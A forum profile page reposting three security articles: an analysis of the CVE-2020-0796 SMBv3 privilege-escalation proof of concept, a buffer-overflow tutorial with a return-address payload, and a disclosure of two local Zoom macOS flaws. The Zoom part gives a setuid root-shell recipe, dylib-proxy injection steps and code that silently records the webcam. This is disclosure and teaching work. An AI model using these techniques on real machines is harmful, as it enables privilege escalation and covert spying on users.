Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Posts posted by Nytro

  1. CVE-2020-0796 Windows SMBv3 LPE Exploit POC Analysis

    2020年04月02日
    漏洞分析 · 404专栏 · 404 English Paper

    Author:SungLin@Knownsec 404 Team
    Time: April 2, 2020
    Chinese version:https://paper.seebug.org/1164/

    0x00 Background

    On March 12, 2020, Microsoft confirmed that a critical vulnerability affecting the SMBv3 protocol exists in the latest version of Windows 10, and assigned it with CVE-2020-0796, which could allow an attacker to remotely execute the code on the SMB server or client. On March 13 they announced the poc that can cause BSOD, and on March 30, the poc that can promote local privileges was released . Here we analyze the poc that promotes local privileges.

    0x01 Exploit principle

    The vulnerability exists in the srv2.sys driver. Because SMB does not properly handle compressed data packets, the function Srv2DecompressData is called when processing the decompressed data packets. The compressed data size of the compressed data header, OriginalCompressedSegmentSize and Offset, is not checked for legality, which results in the addition of a small amount of memory. SmbCompressionDecompress can be used later for data processing. Using this smaller piece of memory can cause copy overflow or out-of-bounds access. When executing a local program, you can obtain the current offset address of the token + 0x40 of the local program that is sent to the SMB server by compressing the data. After that, the offset address is in the kernel memory that is copied when the data is decompressed, and the token is modified in the kernel through a carefully constructed memory layout to enhance the permissions.

    0x02 Get Token

    Let's analyze the code first. After the POC program establishes a connection with smb, it will first obtain the Token of this program by calling the function OpenProcessToken. The obtained Token offset address will be sent to the SMB server through compressed data to be modified in the kernel driver. Token is the offset address of the handle of the process in the kernel. TOKEN is a kernel memory structure used to describe the security context of the process, including process token privilege, login ID, session ID, token type, etc.

    11b34be7-0a25-4a8e-80e3-1979aab3146c.png

    Following is the Token offset address obtained by my test.

    be88ad31-e58a-481f-8df9-6c17dcebd1c0.png

    0x03 Compressed Data

    Next, poc will call RtCompressBuffer to compress a piece of data. By sending this compressed data to the SMB server, the SMB server will use this token offset in the kernel, and this piece of data is 'A' * 0x1108 + (ktoken + 0x40).

    e794a29f-face-4b85-b6be-2215bb260280.png

    The length of the compressed data is 0x13. After this compressed data is removed except for the header of the compressed data segment, the compressed data will be connected with two identical values 0x1FF2FF00BC, and these two values will be the key to elevation.

    1b8d2c42-5579-4bba-93ea-1248f480b452.png

    e739d6a7-7d3f-4d04-8850-b8a0948a3130.png

    0x04 debugging

    Let's debug it first, because here is an integer overflow vulnerability. In the function srv2! Srv2DecompressData, an integer overflow will be caused by the multiplication 0xffff ffff * 0x10 = 0xf, and a smaller memory will be allocated in srvnet! SrvNetAllocateBuffer.

    f1e5efa0-a624-4a00-a1df-5c7bcb8fa253.png

    After entering srvnet! SmbCompressionDecompress and nt! RtlDecompressBufferEx2 to continue decompression, then entering the function nt! PoSetHiberRange, and then starting the decompression operation, adding OriginalMemory = 0xffff ffff to the memory address of the UnCompressBuffer storage data allocated by the integer overflow just started Get an address far larger than the limit, it will cause copy overflow.

    9746571d-0319-4231-aa07-c43d0b6a635e.png

    But the size of the data we need to copy at the end is 0x1108, so there is still no overflow, because the real allocated data size is 0x1278, when entering the pool memory allocation through srvnet! SrvNetAllocateBuffer, finally enter srvnet! SrvNetAllocateBufferFromPool to call nt! ExAllocatePoolWithTag to allocate pool memory.

    409f20cc-ec25-47b7-9359-e0313f37c0fd.png

    Although the copy did not overflow, it did overwrite other variables in this memory, including the return value of srv2! Srv2DecompressDatade. The UnCompressBuffer_addressis fixed at 0x60, and the return value relative to the UnCompressBuffer_address offset is fixed at 0x1150, which means that the offset to store the address of the UnCompressBuffer relative to the return value is 0x10f0, and the address to store the offset data is 0x1168, relative to the storage decompression Data address offset is 0x1108.

    43dae880-4410-4167-a17f-cb4ac0c7c96c.png

    There is a question why it is a fixed value, because the OriginalSize = 0xffff ffff, offset = 0x10 passed in this time, the multiplication integer overflow is 0xf, and in srvnet! SrvNetAllocateBuffer, the size of the passed in 0xf is judged, which is less At 0x1100, a fixed value of 0x1100 will be passed in as the memory allocation value of the subsequent structure space for the corresponding operation, and when the value is greater than 0x1100, the size passed in will be used.

    5fd685b6-e0ee-484e-b5c0-efcd405961b4.png

    Then return to the decompressed data. The size of the decompressed data is 0x13. The decompression will be performed normally. Copy 0x1108of "A", the offset address of the 8-byte token + 0x40 will be copied to the back of "A".

    f4c9fc80-a89d-43d8-a6a1-849d2668b943.png

    46ddd0a2-cfa4-4a57-a26c-59964739875f.png

    After decompression and copying the decompressed data to the address that was initially allocated, exit the decompression function normally, and then call memcpy for the next data copy. The key point is that rcx now becomes the address of token + 0x40of the local program!!!

    57970fda-9d86-4876-bfa8-d46e51690e65.png

    After the decompression, the distribution of memory data is 0x1100 ('A') + Token = 0x1108, and then the function srvnet! SrvNetAllocateBuffer is called to return the memory address we need, and the address of v8 is just the initial memory offset 0x10f0, so v8 + 0x18 = 0x1108, the size of the copy is controllable, and the offset size passed in is 0x10. Finally, memcpy is called to copy the source address to the compressed data0x1FF2FF00BC to the destination address 0xffff9b893fdc46f0 (token + 0x40), the last 16 Bytes will be overwritten, the value of the token is successfully modified.

    63155c21-e930-4726-8ddb-d3614d828887.png

    0x05 Elevation

    The value that is overwritten is two identical 0x1FF2FF00BC. Why use two identical values to overwrite the offset of token + 0x40? This is one of the methods for operating the token in the windows kernel to enhance the authority. Generally, there are two methods.

    506ad4fd-ca6f-4082-9cc2-e81f6e5aa60f.png

    The first method is to directly overwrite the Token. The second method is to modify the Token. Here, the Token is modified.

    In windbg, you can run the kd> dt _token command to view its structure.

    57bf71fd-f358-4449-b127-0f052e9132bc.png

    So modify the value of _SEP_TOKEN_PRIVILEGES to enable or disable it, and change the values of Present and Enabled to all privileges of the SYSTEM process token 0x1FF2FF00BC, and then set the permission to:

    21e3e471-b95e-44aa-81b4-99866d42cc85.png

    This successfully elevated the permissions in the kernel, and then execute any code by injecting regular shellcode into the windows process "winlogon.exe":

    3ddbebca-a7d2-455d-bf54-aff1be7bf75a.png

    Then it performed the action of the calculator as follows:

    e1e13852-7bf9-49e4-bf5d-788a6710ea1f.png

    Reference link:

    1. https://github.com/eerykitty/CVE-2020-0796-PoC

    2. https://github.com/danigargu/CVE-2020-0796

    3. https://ired.team/miscellaneous-reversing-forensics/windows-kernel/how-kernel-exploits-abuse-tokens-for-privilege-escalation


    Paper 本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1165/

     

    Sursa: https://paper.seebug.org/1165/

  2. Binary Exploitation 01 — Introduction

    Mar 31 · 4 min read
     
     
    1*M004F9wG5nUH-PHlBh7t0A.jpeg?q=20
    1*M004F9wG5nUH-PHlBh7t0A.jpeg

    GREETINGS FELLOW HACKERS!
    It’s been a while since our last post, but this is because we’ve prepared something for you: a multi episodes Binary Exploitation Series. Without further ado, let’s get started.


    What is Memory Corruption?
    It might sound familiar, but what does it really mean?
    Memory Corruption is a vast area which we will explore more along this series, but for now, it is important to remember that it refers to the action of “modifying a binary’s memory in a way that was not intended”. Basically any kind of system-level exploit involves some kind of memory corruption.


    Let’s have a look at an example:

    1*RD2qMKgKrBjZVi-vvH4DBg.png?q=20
    1*RD2qMKgKrBjZVi-vvH4DBg.png

    We will consider the following program. A short program that asks for user input. If the input matches Admin’s secret Password, we will be granted Admin privileges, otherwise we will be a normal User.
    How can we become an Admin without knowing the Password?
    One solution is to brute-force the password. This approach might work for a short password, but for a 32bytes password, it’s useless. Then what can we do? Let’s play with random input values:

    1*cN6Pwr21elgh_zztLZhT1A.png?q=20
    1*cN6Pwr21elgh_zztLZhT1A.png

    “Welcome Admin”, what just happened? Let’s take a closer look at the memory level, using a debugger, and understand why we became Admin.

    1*EPo77oXv8NNZMo15KBklwg.png?q=20
    1*EPo77oXv8NNZMo15KBklwg.png

    We can see that the INPUT we enter will be loaded on the stack (“A stack is an area of memory for storing data temporarily”) at RBP-0x30 and the AUTH variable is located on the stack at RBP-0x4.

    Another aspect we can observe is that the “gets” function has no limit for the number of characters it reads.

    Thus, we can enter more than 32 characters. This will lead to a so called: Buffer Overflow.

    1*-PQWDQl5o9_KYuGosB3mcw.png?q=20
    1*-PQWDQl5o9_KYuGosB3mcw.png

    As we can see, our input ( ‘A’*32 + ‘a’*16) will overflow the user_input buffer and overwrite the auth variable, thus giving us Admin privileges.

    Think this is cool? Just wait, there’s even more.


    We have seen that by performing buffer overflows we can overwrite variables on the stack. But is that all we can really do? Let’s have a quick look into how functions work.

    1*9u4crVq6Y0-DIxMF7fvY5Q.png?q=20
    1*9u4crVq6Y0-DIxMF7fvY5Q.png
    1*PYTtIPO76BwqXeFbH4aZMg.png?q=20
    1*PYTtIPO76BwqXeFbH4aZMg.png

    Whenever a function is called, we can see that a value is pushed to the stack. That value is what we call a “return address”. After the function finishes executing, it can return to the function that called it using the “return address”.
    So if the return address is placed on the stack and we can perform a buffer overflow, can we overwrite it? Let’s try.

    1*CQKIRWn3OAY5KXLr6LN0hg.png?q=20
    1*CQKIRWn3OAY5KXLr6LN0hg.png
    Running the program with big input
    1*feiweB4ZU5w8nkZMNWL2CA.png?q=20
    1*feiweB4ZU5w8nkZMNWL2CA.png

    As we can see, the program returned a “Segmentation Fault” because, when the main function finished executing it tried to use the “return address”, but the return address was overwritten with A’s by out input.

    So what does this mean? This means that we can take over the execution flow by overwriting the “return address” with an address of another function. Let’s try to redirect the execution of the program to the takeover_the_world() function.
    The function is located at address: 0x00000000004005c7 (one way we can find this is us the command: objdump -d program_name).

    Putting things together we get the following input (payload):
    ‘A’*32 + ‘a’*16 + ‘\xc7\x05\x40\x00\x00\x00\x00\x00’

    1*dVfrbgGhS7J1g7_4EO_QWA.png?q=20
    1*dVfrbgGhS7J1g7_4EO_QWA.png

    And we got a shell. Hurray!


    Concluding this first part, I hope I have aroused your curiosity and interest in this wonderful topic. Buffer overflows are one of the many ways memory corruption can be achieved. In the upcoming episodes we will explore more techniques and strategies.

    Until next time!

    Sursa: https://medium.com/cyber-dacians/binary-exploitation-01-introduction-9fcd2cdce9c6


  3.  
    The 'S' in Zoom, Stands for Security
    uncovering (local) security flaws in Zoom's latest macOS client
    by: Patrick Wardle / March 30, 2020
    Our research, tools, and writing, are supported by the "Friends of Objective-See" such as:
     CleanMy Mac X
     Malwarebytes  Airo AV
     
    📝 Update:

    Zoom has patched both bugs in Version 4.6.9 (19273.0402):

    fix.png

    For more details see:

    New Updates for macOS

    Background

    Given the current worldwide pandemic and government sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, “the leader in modern enterprise video communications” is well on it’s way to becoming a household verb, and as a result, its stock price has soared! 📈

    However if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app.

    In this blog post, we’ll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we’ll transition into discussing several new security issues that affect the latest version of Zoom’s macOS client.

    📝 Though the new issues we'll discuss today remain unpatched, they both are local security issues.

    As such, to be successfully exploited they required that malware or an attacker already have a foothold on a macOS system.

    Though Zoom is incredibly popular it has a rather dismal security and privacy track record.

    In June 2019, the security researcher Jonathan Leitschuh discovered a trivially exploitable remote 0day vulnerability in the Zoom client for Mac, which “allow[ed] any malicious website to enable your camera without your permission😱

    hijack.png

    This vulnerability allows any website to forcibly join a user to a Zoom call, with their video camera activated, without the user’s permission.

    Additionally, if you’ve ever installed the Zoom client and then uninstalled it, you still have a localhost web server on your machine that will happily re-install the Zoom client for you, without requiring any user interaction on your behalf besides visiting a webpage. This re-install ‘feature’ continues to work to this day.” -Jonathan Leitschuh

     
    📝 Interested in more details? Read Jonathan's excellent writeup:
     
    "Zoom Zero Day: 4+ Million Webcams & maybe an RCE?".

    Rather hilariously Apple (forcibly!) removed the vulnerable Zoom component from user’s macs worldwide via macOS’s Malware Removal Tool (MRT😞

     

    AFAIK, this is the only time Apple has taken this draconian action:

     

    More recently Zoom suffered a rather embarrassing privacy faux pas, when it was uncovered that their iOS application was, “send[ing] data to Facebook even if you don’t have a Facebook account” …yikes!

    privacy.png
    📝 Interested in more details? Read Motherboard's writeup:
     
    "Zoom iOS App Sends Data to Facebook Even if You Don't Have a Facebook Account".

    Although Zoom was quick to patch the issue (by removing the (ir)responsible code), many security researchers were quick to point out that said code should have never made it into the application in the first place:

     

    And finally today, noted macOS security researcher Felix Seele (and #OBTS v2.0 speaker!) noted that Zoom’s macOS installer (rather shadily) performs it’s “[install] job without you ever clicking install":

     
     
    "This is not strictly malicious but very shady and definitely leaves a bitter aftertaste. The application is installed without the user giving his final consent and a highly misleading prompt is used to gain root privileges. The same tricks that are being used by macOS malware." -Felix Seele
    📝 For more details on this, see Felix's comprehensive blog post:
     
    "Good Apps Behaving Badly: Dissecting Zoom’s macOS installer workaround"

    The (preinstall) scripts mentioned by Felix, can be easily viewed (and extracted) from Zoom’s installer package via the Suspicious Package application:

    package.png

    Local Zoom Security Flaw #1: Privilege Escalation to Root

    Zoom’s security and privacy track record leaves much to be desired.

    As such, today when Felix Seele also noted that the Zoom installer may invoke the AuthorizationExecuteWithPrivileges API to perform various privileged installation tasks, I decided to take a closer look. Almost immediately I uncovered several issues, including a vulnerability that leads to a trivial and reliable local privilege escalation (to root!).

     

    Stop me if you’ve heard me talk (rant) about this before, but Apple clearly notes that the AuthorizationExecuteWithPrivileges API is deprecated and should not be used. Why? Because the API does not validate the binary that will be executed (as root!) …meaning a local unprivileged attacker or piece of malware may be able to surreptitiously tamper or replace that item in order to escalate their privileges to root (as well):

    attack.png


    At DefCon 25, I presented a talk titled: “Death By 1000 Installers” that covers this in great detail:

    …moreover in my blog post “Sniffing Authentication References on macOS” from just last week, we covered this in great detail as well!

    Finally, this insecure API was (also) discussed in detail in at “Objective by the Sea” v3.0, in a talk (by Julia Vashchenko) titled: “Job(s) Bless Us! Privileged Operations on macOS":

    deprecated.png

    Now it should be noted that if the AuthorizationExecuteWithPrivileges API is invoked with a path to a (SIP) protected or read-only binary (or script), this issue would be thwarted (as in such a case, unprivileged code or an attacker may not be able subvert the binary/script).

    So the question here, in regards to Zoom is; “How are they utilizing this inherently insecure API? Because if they are invoking it insecurely, we may have a lovely privilege escalation vulnerability!

    As discussed in my DefCon presentation, the easiest way is answer this question is simply to run a process monitor, execute the installer package (or whatever invokes the AuthorizationExecuteWithPrivileges API) and observe the arguments that are passed to the security_authtrampoline (the setuid system binary that ultimately performs the privileged action):

    apiDetails.png

    The image above illustrates the flow of control initiated by the AuthorizationExecuteWithPrivileges API and shows how the item (binary, script, command, etc) to is to be executed with root privileges is passed as the first parameter to security_authtrampoline process. If this parameter, this item, is editable (i.e. can be maliciously subverted) by an unprivileged attacker then that’s a clear security issue!

    Let’s figure out what Zoom is executing via AuthorizationExecuteWithPrivileges!

    First we download the latest version of Zoom’s installer for macOS (Version 4.6.8 (19178.0323)) from https://zoom.us/download:

    version.png

    Then, we fire up our macOS Process Monitor (https://objective-see.com/products/utilities.html#ProcessMonitor), and launch the Zoom installer package (Zoom.pkg).

    If the user installing Zoom is running as a ‘standard’ (read: non-admin) user, the installer may prompt for administrator credentials:

    prompt.png

    …as expected our process monitor will observe the launching (ES_EVENT_TYPE_NOTIFY_EXEC) of /usr/libexec/security_authtrampoline to handle the authorization request:

    # ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty
    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "uid" : 0,
        "arguments" : [
          "/usr/libexec/security_authtrampoline",
          "./runwithroot",
          "auth 3",
          "/Users/tester/Applications/zoom.us.app",
          "/Applications/zoom.us.app"
        ],
        "ppid" : 1876,
        "ancestors" : [
          1876,
          1823,
          1820,
          1
        ],
        "signing info" : {
          "csFlags" : 603996161,
          "signatureIdentifier" : "com.apple.security_authtrampoline",
          "cdHash" : "DC98AF22E29CEC96BB89451933097EAF9E01242",
          "isPlatformBinary" : 1
        },
        "path" : "/usr/libexec/security_authtrampoline",
        "pid" : 1882
      },
      "timestamp" : "2020-03-31 03:18:45 +0000"
    }
    

    And what is Zoom attempting to execute as root (i.e. what is passed to security_authtrampoline?)

    …a bash script named runwithroot.

    If the user provides the requested credentials to complete the install, the runwithroot script will be executed as root (note: uid: 0😞

    {
      "event" : "ES_EVENT_TYPE_NOTIFY_EXEC",
      "process" : {
        "uid" : 0,
        "arguments" : [
          "/bin/sh",
          "./runwithroot",
          "/Users/tester/Applications/zoom.us.app",
          "/Applications/zoom.us.app"
        ],
        "ppid" : 1876,
        "ancestors" : [
          1876,
          1823,
          1820,
          1
        ],
        "signing info" : {
          "csFlags" : 603996161,
          "signatureIdentifier" : "com.apple.sh",
          "cdHash" : "D3308664AA7E12DF271DC78A7AE61F27ADA63BD6",
          "isPlatformBinary" : 1
        },
        "path" : "/bin/sh",
        "pid" : 1882
      },
      "timestamp" : "2020-03-31 03:18:45 +0000"
    }
    

    The contents of runwithroot are irrelevant. All that matters is, can a local, unprivileged attacker (or piece of malware) subvert the script prior its execution as root? (As again, recall the AuthorizationExecuteWithPrivileges API does not validate what is being executed).

    Since it’s Zoom we’re talking about, the answer is of course yes! 😅

    We can confirm this by noting that during the installation process, the macOS Installer (which handles installations of .pkgs) copies the runwithroot script to a user-writable temporary directory:

    tester@users-Mac T % pwd      
    /private/var/folders/v5/s530008n11dbm2n2pgzxkk700000gp/T
    tester@users-Mac T % ls -lart com.apple.install.v43Mcm4r
    total 27224
    -rwxr-xr-x   1 tester  staff     70896 Mar 23 02:25 zoomAutenticationTool
    -rw-r--r--   1 tester  staff       513 Mar 23 02:25 zoom.entitlements
    -rw-r--r--   1 tester  staff  12008512 Mar 23 02:25 zm.7z
    -rwxr-xr-x   1 tester  staff       448 Mar 23 02:25 runwithroot
    ...
    

     

    Lovely - it looks like we’re in business and may be able to gain root privileges!

    Exploitation of these types of bugs is trivial and reliable (though requires some patience …as you have to wait for the installer or updater to run!) as is show in the following diagram:

    exploitation.png

    To exploit Zoom, a local non-privileged attacker can simply replace or subvert the runwithroot script during an install (or upgrade?) to gain root access.

    For example to pop a root shell, simply add the following commands to the runwithroot script:

    1cp /bin/ksh /tmp
    2chown root:wheel /tmp/ksh
    3chmod u+s /tmp/ksh
    4open /tmp/ksh  

    Le boom 💥:

    root.png

    Local Zoom Security Flaw #2: Code Injection for Mic & Camera Access

    In order for Zoom to be useful it requires access to the system’s mic and camera.

    On recent versions of macOS, this requires explicit user approval (which, from a security and privacy point of view is a good thing):

    access.png

    Unfortunately, Zoom has (for reasons unbeknown to me), a specific “exclusion” that allows malicious code to be injected into its process space, where said code can piggy-back off Zoom’s (mic and camera) access! This give malicious code a way to either record Zoom meetings, or worse, access the mic and camera at arbitrary times (without the user access prompt)!

    Modern macOS applications are compiled with a feature called the “Hardened Runtime”. This security enhancement is well documented by Apple, who note:

    "The Hardened Runtime, along with System Integrity Protection (SIP), protects the runtime integrity of your software by preventing certain classes of exploits, like code injection, dynamically linked library (DLL) hijacking, and process memory space tampering." -Apple

    I’d like to think that Apple attended my 2016 at ZeroNights in Moscow, where I noted this feature would be a great addition to macOS: suggestion.jpeg

    We can check that Zoom (or any application) is validly signed and compiled with the “Hardened Runtime” via the codesign utility:

    $ codesign -dvvv /Applications/zoom.us.app/
    Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
    Identifier=us.zoom.xos
    Format=app bundle with Mach-O thin (x86_64)
    CodeDirectory v=20500 size=663 flags=0x10000(runtime) hashes=12+5 location=embedded
    
    ...
    Authority=Developer ID Application: Zoom Video Communications, Inc. (BJ4HAAB9B3)
    Authority=Developer ID Certification Authority
    Authority=Apple Root CA
    
    

    A flags value of 0x10000(runtime) indicates that the application was compiled with the “Hardened Runtime” option, and thus said runtime, should be enforced by macOS for this application.

    Ok so far so good! Code injection attacks should be generically thwarted due to this!

    …but (again) this is Zoom, so not so fast 😅

    Let’s dump Zoom’s entitlements (entitlements are code-signed capabilities and/or exceptions), again via the codesign utility:

    codesign -d --entitlements :- /Applications/zoom.us.app/
    Executable=/Applications/zoom.us.app/Contents/MacOS/zoom.us
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN...>
    <plist version="1.0">
    <dict>
      <key>com.apple.security.automation.apple-events</key>
      <true/>
      <key>com.apple.security.device.audio-input</key>
      <true/>
      <key>com.apple.security.device.camera</key>
      <true/>
      <key>com.apple.security.cs.disable-library-validation</key>
      <true/>
      <key>com.apple.security.cs.disable-executable-page-protection</key>
      <true/>
    </dict>
    </plist>
    

    The com.apple.security.device.audio-input and com.apple.security.device.camera entitlements are required as Zoom needs (user-approved) mic and camera access.

    However the com.apple.security.cs.disable-library-validation entitlement is interesting. In short it tells macOS, “hey, yah I still (kinda?) want the “Hardened Runtime”, but please allow any libraries to be loaded into my address space” …in other words, library injections are a go!

    Apple documents this entitlement as well:

    entitlement.png

    So, thanks to this entitlement we can (in theory) circumvent the “Hardened Runtime” and inject a malicious library into Zoom (for example to access the mic and camera without an access alert).

    There are variety of ways to coerce a remote process to load a dynamic library at load time, or at runtime. Here we’ll focus on a method I call “dylib proxying”, as it’s both stealthy and persistent (malware authors, take note!).

    In short, we replace a legitimate library that the target (i.e. Zoom) depends on, then, proxy all requests made by Zoom back to the original library, to ensure legitimate functionality is maintained. Both the app, and the user remains none the wiser!

    📝 Another benefit of the "dylib proxying" is that it does not compromise the code signing certificate of the binary (however, it may affect the signature of the application bundle).

    A benefit of this, is that Apple's runtime signature checks (e.g. for mic & camera access) do not seem to detect the malicious library, and thus still afford the process continued access to the mic & camera.

    This is a method I’ve often (ab)used before in a handful of exploits, for example to (previously) bypass SIP:

    proxy.png

    As the image illustrates one could proxied the IASUtilities library so that malicious code would be automatically loaded (‘injected’) by the macOS dynamic linker (dyld) into Apple’s installer (a prerequisite for the SIP bypass exploit).

    Here, we’ll similarly proxy a library (required by Zoom), such that our malicious library will be automatically loaded into Zoom’s trusted process address space any time its launched.

    To determine what libraries Zoom is linked against (read: requires), and thus will be automatically loaded by the macOS dynamic loader, we can use the otool with the -L flag:

    $ otool -L /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    /Applications/zoom.us.app/Contents/MacOS/zoom.us:
      @rpath/curl64.framework/Versions/A/curl64
      /System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
      /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
      /usr/lib/libobjc.A.dylib
      /usr/lib/libc++.1.dylib
      /usr/lib/libSystem.B.dylib
      /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
      /System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
      /System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
    

     

    📝 Due to macOS's System Integrity Protection (SIP), we cannot replace any system libraries.

    As such, for an application to be ‘vulnerable’ to “dylib proxying” it must load a library from either its own application bundle, or another non-SIP’d location (and must not be compiled with the “hardened runtime” (well unless it has the com.apple.security.cs.disable-library-validation entitlement exception)).

    Looking at the Zoom’s library dependencies, we see: @rpath/curl64.framework/Versions/A/curl64. We can resolve the runpath (@rpath) again via otool, this time with the -l flag:

    $ otool -l /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    ...
    
    Load command 22
              cmd LC_RPATH
          cmdsize 48
             path @executable_path/../Frameworks (offset 12)
    
    

    The @executable_path will be resolved at runtime to the binary’s path, thus the dylib will be loaded out of: /Applications/zoom.us.app/Contents/MacOS/../Frameworks, or more specifically /Applications/zoom.us.app/Contents/Frameworks.

    Taking a peak at Zoom’s application bundle, we can confirm the presence of the curl64 (and many other frameworks and libraries) that will all be loaded whenever Zoom is launched:

    frameworks.png
    📝 For details on "runpaths" (@rpath) and executable paths (@executable_path) as well as more information on creating a proxy dylib, check out my paper:
     
    "Dylib Hijacking on OS X"

    For simplicity sake, we’ll target Zoom’s libssl.1.0.0.dylib (as it’s a stand-alone library, versus a framework/bundle) as the library we’ll proxy.

    Step #1 is to rename the legitimate library. For example here, we simply prefix it with an underscore: _libssl.1.0.0.dylib

    Now, if we running Zoom, it will (as expected) crash, as a library it requires (libssl.1.0.0.dylib) is ‘missing’:

    patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    dyld: Library not loaded: @rpath/libssl.1.0.0.dylib
    Referenced from: /Applications/zoom.us.app/Contents/Frameworks/curl64.framework/Versions/A/curl64
    Reason: image not found
    Abort trap: 6
    

    This is actually good news, as it means if we place any library named libssl.1.0.0.dylib in Zoom’s Frameworks directory dyld will (blindly) attempt to load it.

    Step #2, let’s create a simple library, with a custom constructor (that will be automatically invoked when the library is loaded):

     1__attribute__((constructor))
     2static void constructor(void)
     3{
     4    char path[PROC_PIDPATHINFO_MAXSIZE];
     5    proc_pidpath (getpid(), path, sizeof(path)-1);
     6    
     7    NSLog(@"zoom zoom: loaded in %d: %s", getpid(), path);
     8
     9    return;
    10} 

    …and save it to /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib.

    Then we re-run Zoom:

    patrick$ /Applications/zoom.us.app/Contents/MacOS/zoom.us 
    zoom zoom: loaded in 39803: /Applications/zoom.us.app/Contents/MacOS/zoom.us
    

    Hooray! Our library is loaded by Zoom.

    Unfortunately Zoom then exits right away. This is also not unexpected as our libssl.1.0.0.dylib is not an ssl library…that is to say, it doesn’t export any required functionality (i.e. ssl capabilities!). So Zoom (gracefully) fails.

    Not to worry, this is where the beauty of “dylib proxying” shines.

    Step #3, via simple linker directives, we can tell Zoom, “hey, while our library don’t implement the required (ssl) functionality you’re looking for, we know who does!” and then point Zoom to the original (legitimate) ssl library (that we renamed _libssl.1.0.0.dylib).

    Diagrammatically this looks like so: reexport.png

    To create the required linker directive, we add the -XLinker -reexport_library and then the path to the proxy library target, under “Other Linker Flags” in Xcode:

    linkerFlags.png

    To complete the creation of the proxy library, we must also update the embedded reexport path (within our proxy dylib) so that it points to the (original, albeit renamed) ssl library. Luckily Apple provides the install_name_tool tool just for this purpose:

    patrick$ install_name_tool -change @rpath/libssl.1.0.0.dylib /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib  /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib 
    

    We can now confirm (via otool) that our proxy library references the original ssl libary. Specifically, we note that our proxy dylib (libssl.1.0.0.dylib) contains a LC_REEXPORT_DYLIB that points to the original ssl library (_libssl.1.0.0.dylib😞

    patrick$ otool -l /Applications/zoom.us.app/Contents/Frameworks/libssl.1.0.0.dylib 
    
    ...
    Load command 11
              cmd LC_REEXPORT_DYLIB
          cmdsize 96
             name /Applications/zoom.us.app/Contents/Frameworks/_libssl.1.0.0.dylib
       time stamp 2 Wed Dec 31 14:00:02 1969
          current version 1.0.0
    compatibility version 1.0.0
    
    

    Re-running Zoom confirms that our proxy library (and the original ssl library) are both loaded, and that Zoom perfectly functions as expected! 🔥

    injected.png

    The appeal of injection a library into Zoom, revolves around its (user-granted) access to the mic and camera. Once our malicious library is loaded into Zoom’s process/address space, the library will automatically inherit any/all of Zooms access rights/permissions!

    This means that if the user as given Zoom access to the mic and camera (a more than likely scenario), our injected library can equally access those devices.

    📝 If Zoom has not been granted access to the mic or the camera, our library should be able to problematically detect this (to silently 'fail').

    …or we can go ahead and still attempt to access the devices, as the access prompt will originate “legitimately” from Zoom and thus likely to be approved by the unsuspecting user.

    To test this “access inheritance” I added some code to the injected library to record a few seconds of video off the webcam:

     1 
     2  AVCaptureDevice* device = [AVCaptureDevice defaultDeviceWithMediaType:AVMediaTypeVideo];
     3    
     4  session = [[AVCaptureSession alloc] init];
     5  output = [[AVCaptureMovieFileOutput alloc] init];
     6  
     7  AVCaptureDeviceInput *input = [AVCaptureDeviceInput deviceInputWithDevice:device 
     8                                error:nil];
     9
    10  movieFileOutput = [[AVCaptureMovieFileOutput alloc] init];
    11  
    12  [self.session addInput:input];
    13  [self.session addOutput:output];
    14  [self.session addOutput:movieFileOutput];
    15  
    16  [self.session startRunning];
    17  
    18  [movieFileOutput startRecordingToOutputFileURL:[NSURL fileURLWithPath:@"zoom.mov"] 
    19                   recordingDelegate:self];
    20  
    21  //stop recoding after 5 seconds
    22  [NSTimer scheduledTimerWithTimeInterval:5 target:self 
    23           selector:@selector(finishRecord:) userInfo:nil repeats:NO];
    24  
    25  ...

    Normally this code would trigger an alert from macOS, asking the user to confirm access to the (mic) and camera. However, as we’re injected into Zoom (which was already given access by the user), no additional prompts will be displayed, and the injected code was able to arbitrarily record audio and video.

    Interestingly, the test captured the real brains behind this research:

    pup.png
    📝 Could malware (ab)use Zoom to capture audio and video at arbitrary times (i.e. to spy on users?). If Zoom is installed and has been granted access to the mic and camera, then yes!

    In fact the /usr/bin/open utility supports the -j flag, which “launches the app hidden”!

    Voila!

    Conclusion

    Today, we uncovered two (local) security issues affecting Zoom’s macOS application. Given Zoom’s privacy and security track record this should surprise absolutely zero people.

    First, we illustrated how unprivileged attackers or malware may be able to exploit Zoom’s installer to gain root privileges.

    Following this, due to an ‘exception’ entitlement, we showed how to inject a malicious library into Zoom’s trusted process context. This affords malware the ability to record all Zoom meetings, or, simply spawn Zoom in the background to access the mic and webcam at arbitrary times! 😱

    The former is problematic as many enterprises (now) utilize Zoom for (likely) sensitive business meetings, while the latter is problematic as it affords malware the opportunity to surreptitious access either the mic or the webcam, with no macOS alerts and/or prompts.

    OSX.FruitFly v2.0 anybody?

    fruitfly.png

    So, what to do? Honestly, if you care about your security and/or privacy perhaps stop using Zoom. And if using Zoom is a must, I’ve written several free tools that may help detect these attacks. 😇

    First, OverSight can alert you anytime anybody access the mic or webcam:

    oversight.png

    Thus even if an attacker or malware is (ab)using Zoom “invisibly” in the background, OverSight will generate an alert.

    Another (free) tool is KnockKnock that can generically detect proxy libraries:

    knockknock.png

    …it’s almost as if offensive cyber-security research can facilitate the creation of powerful defensive tools! 🛠️ 😇

     
    ❤️ Love these blog posts and/or want to support my research and tools?

    You can support them via my Patreon page!

     

